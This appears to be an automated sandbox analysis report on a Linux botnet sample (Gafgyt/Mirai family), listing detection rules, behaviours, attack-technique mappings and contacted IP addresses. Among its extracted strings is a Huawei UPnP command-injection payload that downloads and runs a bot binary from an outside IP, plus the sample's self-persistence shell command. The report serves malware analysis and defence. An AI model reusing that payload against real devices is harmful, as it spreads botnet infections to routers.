            Source: 6232.1.00007f18c4011000.00007f18c4022000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: k9fBkBGZNf.elf PID: 6232, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: bin/busybox
            Source: Initial sampleString containing 'busybox' found: _h/bin/busybox/bin/watchdog/bin/systemdbin/busyboxbin/watchdogbin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777
            Source: classification engineClassification label: mal92.troj.linELF@0/0@6007/0

            Persistence and Installation Behavior

            barindex
            Source: /bin/sh (PID: 6239)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/watchdogJump to behavior
            Source: /bin/sh (PID: 6237)Mkdir executable: /usr/bin/mkdir -> mkdir binJump to behavior
            Source: /bin/sh (PID: 6239)Chmod executable: /usr/bin/chmod -> chmod 777 bin/watchdogJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1582/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/3088/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/230/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/231/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/232/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1579/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/233/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1699/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/234/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1335/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1698/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1334/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1576/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/2302/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/236/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/237/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/910/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/912/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/2307/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/918/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/15/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/6245/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/17/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/6247/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1594/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/121/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1349/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/122/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/243/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/123/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/2/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/124/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/3/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/4/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/125/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/126/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1344/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1465/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1586/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/127/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/6/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/248/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/128/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/249/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1463/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/800/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/9/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/801/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/20/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/21/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1900/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/22/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/23/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/24/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/25/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/26/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/27/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/28/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/29/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/491/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/250/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/130/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/251/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/252/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/132/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/253/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/254/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/255/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/256/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1599/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/257/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1477/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/379/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/258/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1476/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/259/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1475/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/936/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/4503/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/30/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/2208/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/35/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1809/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/1494/cmdlineJump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6243)File opened: /proc/260/cmdlineJump to behavior
            Source: /usr/bin/chmod (PID: 6239)File: /tmp/bin/watchdog (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
            Source: /tmp/k9fBkBGZNf.elf (PID: 6234)Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/k9fBkBGZNf.elf bin/watchdog; chmod 777 bin/watchdog"Jump to behavior
            Source: /bin/sh (PID: 6236)Rm executable: /usr/bin/rm -> rm -rf bin/watchdogJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47280 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 47280
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 45808
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 60888
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59212 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 59212
            Source: unknownNetwork traffic detected: HTTP traffic on port 41644 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41442 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 41442
            Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 37215
            Source: /tmp/k9fBkBGZNf.elf (PID: 6232)Queries kernel information via 'uname': Jump to behavior
            Source: k9fBkBGZNf.elf, 6232.1.0000562c98277000.0000562c982dc000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
            Source: k9fBkBGZNf.elf, 6232.1.0000562c98277000.0000562c982dc000.rw-.sdmpBinary or memory string: ,V!/etc/qemu-binfmt/sparc
            Source: k9fBkBGZNf.elf, 6232.1.00007fff8e88b000.00007fff8e8ac000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sparc/tmp/k9fBkBGZNf.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/k9fBkBGZNf.elf
            Source: k9fBkBGZNf.elf, 6232.1.00007fff8e88b000.00007fff8e8ac000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: k9fBkBGZNf.elf, type: SAMPLE
            Source: Yara matchFile source: 6232.1.00007f18c4011000.00007f18c4022000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: k9fBkBGZNf.elf, type: SAMPLE
            Source: Yara matchFile source: 6232.1.00007f18c4011000.00007f18c4022000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: k9fBkBGZNf.elf PID: 6232, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: k9fBkBGZNf.elf, type: SAMPLE
            Source: Yara matchFile source: 6232.1.00007f18c4011000.00007f18c4022000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: k9fBkBGZNf.elf, type: SAMPLE
            Source: Yara matchFile source: 6232.1.00007f18c4011000.00007f18c4022000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: k9fBkBGZNf.elf PID: 6232, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Scripting
            Path InterceptionPath Interception2
            File and Directory Permissions Modification
            1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Scripting
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
            Non-Standard Port
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
            File Deletion
            Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 843661 Sample: k9fBkBGZNf.elf Startdate: 09/04/2023 Architecture: LINUX Score: 92 27 botnet.layer4.vip 2->27 29 197.152.227.95 airtel-tz-asTZ Tanzania United Republic of 2->29 31 99 other IPs or domains 2->31 33 Snort IDS alert for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 4 other signatures 2->39 8 k9fBkBGZNf.elf 2->8         started        signatures3 process4 process5 10 k9fBkBGZNf.elf sh 8->10         started        12 k9fBkBGZNf.elf 8->12         started        process6 14 sh chmod 10->14         started        17 sh rm 10->17         started        19 sh mkdir 10->19         started        21 sh mv 10->21         started        23 k9fBkBGZNf.elf 12->23         started        25 k9fBkBGZNf.elf 12->25         started        signatures7 41 Sets full permissions to files and/or directories 14->41
            SourceDetectionScannerLabelLink
            k9fBkBGZNf.elf57%ReversingLabsLinux.Trojan.Mirai
            k9fBkBGZNf.elf62%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            botnet.layer4.vip1%VirustotalBrowse
            No Antivirus matches

            Download Network PCAP: filteredfull

            NameIPActiveMaliciousAntivirus DetectionReputation
            botnet.layer4.vip
            unknown
            unknowntrueunknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/soap/encoding/k9fBkBGZNf.elffalse
              high
              http://schemas.xmlsoap.org/soap/envelope/k9fBkBGZNf.elffalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                41.149.138.203
                unknownSouth Africa
                5713SAIX-NETZAfalse
                157.86.200.134
                unknownBrazil
                21612FUNDACAOINSTITUTOOSWALDOCRUZBRfalse
                197.208.8.18
                unknownSudan
                36998SDN-MOBITELSDfalse
                197.172.14.124
                unknownSouth Africa
                37168CELL-CZAfalse
                63.128.71.14
                unknownUnited States
                3561CENTURYLINK-LEGACY-SAVVISUSfalse
                41.169.50.121
                unknownSouth Africa
                36937Neotel-ASZAfalse
                157.117.193.133
                unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
                157.2.248.90
                unknownJapan4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                197.239.56.175
                unknownUganda
                37075ZAINUGASUGfalse
                157.74.249.229
                unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
                41.48.216.162
                unknownSouth Africa
                37168CELL-CZAfalse
                157.166.39.210
                unknownUnited States
                49964VERIXI-BACKUPNETWORKBEfalse
                197.92.242.213
                unknownSouth Africa
                10474OPTINETZAfalse
                197.166.129.94
                unknownEgypt
                24863LINKdotNET-ASEGfalse
                132.190.20.112
                unknownUnited States
                14398AUTODESKUSfalse
                157.82.235.2
                unknownJapan2501UTNETTheUniversityofTokyoJPfalse
                197.153.36.59
                unknownMorocco
                36925ASMediMAfalse
                157.86.200.125
                unknownBrazil
                21612FUNDACAOINSTITUTOOSWALDOCRUZBRfalse
                157.39.222.205
                unknownIndia
                55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                157.120.16.198
                unknownJapan2514INFOSPHERENTTPCCommunicationsIncJPfalse
                41.192.2.22
                unknownSouth Africa
                29975VODACOM-ZAfalse
                41.108.48.176
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                41.219.154.56
                unknownNigeria
                37196SUDATEL-SENEGALSNfalse
                41.54.12.247
                unknownSouth Africa
                37168CELL-CZAfalse
                41.71.111.194
                unknownSouth Africa
                37053RSAWEB-ASZAfalse
                197.249.146.205
                unknownMozambique
                25139TVCABO-ASEUfalse
                157.118.135.126
                unknownJapan58785TGU-NETTohokuGakuinUniversityJPfalse
                197.208.144.168
                unknownSudan
                36998SDN-MOBITELSDfalse
                197.193.220.34
                unknownEgypt
                36992ETISALAT-MISREGfalse
                41.251.165.131
                unknownMorocco
                36903MT-MPLSMAfalse
                101.88.85.95
                unknownChina
                4812CHINANET-SH-APChinaTelecomGroupCNfalse
                157.126.102.223
                unknownUnited States
                1738OKOBANK-ASEUfalse
                157.249.189.169
                unknownNorway
                224UNINETTUNINETTTheNorwegianUniversityResearchNetworkfalse
                197.46.218.192
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                41.152.192.27
                unknownEgypt
                36992ETISALAT-MISREGfalse
                197.4.29.38
                unknownTunisia
                5438ATI-TNfalse
                197.184.139.248
                unknownSouth Africa
                37105NEOLOGY-ASZAfalse
                197.129.247.27
                unknownMorocco
                6713IAM-ASMAfalse
                211.223.244.239
                unknownKorea Republic of
                23714KMUCC-AS-KRKeimyungUniversityKRfalse
                197.10.113.80
                unknownTunisia
                5438ATI-TNfalse
                41.21.239.196
                unknownSouth Africa
                36994Vodacom-VBZAfalse
                197.38.199.148
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                41.108.235.36
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                197.187.29.153
                unknownTanzania United Republic of
                37133airtel-tz-asTZfalse
                157.166.40.136
                unknownUnited States
                49964VERIXI-BACKUPNETWORKBEfalse
                130.135.85.249
                unknownUnited States
                270AS270USfalse
                41.97.63.134
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                42.214.13.53
                unknownChina
                4249LILLY-ASUSfalse
                41.108.224.103
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                9.211.121.181
                unknownUnited States
                3356LEVEL3USfalse
                197.179.217.46
                unknownKenya
                33771SAFARICOM-LIMITEDKEfalse
                113.32.75.22
                unknownJapan17506UCOMARTERIANetworksCorporationJPfalse
                197.254.156.11
                unknownLesotho
                37057VODACOM-LESOTHOLSfalse
                47.56.146.64
                unknownUnited States
                45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                157.229.129.55
                unknownUnited States
                122UPMC-AS122USfalse
                208.113.34.144
                unknownCanada
                21570ACI-1CAfalse
                41.47.89.59
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                197.180.132.99
                unknownKenya
                33771SAFARICOM-LIMITEDKEfalse
                157.49.59.63
                unknownIndia
                55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                157.9.125.69
                unknownJapan4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                142.246.56.198
                unknownCanada
                395272PCMCAfalse
                41.83.74.175
                unknownSenegal
                8346SONATEL-ASAutonomousSystemEUfalse
                157.37.165.89
                unknownIndia
                55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                197.67.121.143
                unknownSouth Africa
                16637MTNNS-ASZAfalse
                157.157.170.196
                unknownIceland
                6677ICENET-AS1ISfalse
                213.179.161.139
                unknownAlgeria
                16214CERISTDZfalse
                197.23.201.56
                unknownTunisia
                37693TUNISIANATNfalse
                19.239.89.67
                unknownUnited States
                3MIT-GATEWAYSUSfalse
                41.169.49.246
                unknownSouth Africa
                36937Neotel-ASZAfalse
                197.0.31.229
                unknownTunisia
                37705TOPNETTNfalse
                157.227.30.150
                unknownAustralia
                4704SANNETRakutenMobileIncJPfalse
                157.150.122.146
                unknownUnited States
                22723UNUSfalse
                157.125.224.44
                unknownSweden
                31655ASN-GAMMATELECOMGBfalse
                157.64.231.26
                unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                41.190.52.90
                unknownZimbabwe
                31856CABSZWfalse
                101.152.29.25
                unknownChina
                9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                72.187.61.56
                unknownUnited States
                33363BHN-33363USfalse
                41.235.97.75
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                157.138.99.122
                unknownItaly
                137ASGARRConsortiumGARREUfalse
                176.75.133.134
                unknownNorway
                2119TELENOR-NEXTELTelenorNorgeASNOfalse
                81.153.75.35
                unknownUnited Kingdom
                2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
                41.186.170.192
                unknownRwanda
                36890MTNRW-ASNRWfalse
                41.61.179.2
                unknownSouth Africa
                36943GridhostZAfalse
                197.82.224.133
                unknownSouth Africa
                10474OPTINETZAfalse
                197.44.77.135
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                157.130.110.118
                unknownUnited States
                701UUNETUSfalse
                197.122.53.193
                unknownEgypt
                36992ETISALAT-MISREGfalse
                197.53.118.56
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                197.152.227.95
                unknownTanzania United Republic of
                37133airtel-tz-asTZfalse
                141.50.128.59
                unknownGermany
                680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                197.173.86.76
                unknownSouth Africa
                37168CELL-CZAfalse
                157.49.47.62
                unknownIndia
                55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                41.239.243.25
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                197.167.97.237
                unknownEgypt
                24863LINKdotNET-ASEGfalse
                157.69.176.213
                unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                157.244.13.176
                unknownCanada
                32934FACEBOOKUSfalse
                197.209.63.122
                unknownSudan
                36998SDN-MOBITELSDfalse
                197.123.124.10
                unknownEgypt
                36992ETISALAT-MISREGfalse
                67.226.42.222
                unknownUnited States
                25977HCCSUSfalse
                157.204.179.5
                unknownUnited States
                54216GORE-NETWORKUSfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                41.149.138.203x86-20220922-1225.elfGet hashmaliciousMirai, MoobotBrowse
                  pgna1rct3YGet hashmaliciousGafgyt MiraiBrowse
                    157.86.200.134arm.elfGet hashmaliciousMirai, MoobotBrowse
                      197.172.14.124bok.arm7-20230304-0316.elfGet hashmaliciousMiraiBrowse
                        41.169.50.121mpsl-20230304-1150.elfGet hashmaliciousMirai, MoobotBrowse
                          x86-20220620-2150Get hashmaliciousMiraiBrowse
                            157.117.193.133paEJxuVWei.elfGet hashmaliciousMirai, MoobotBrowse
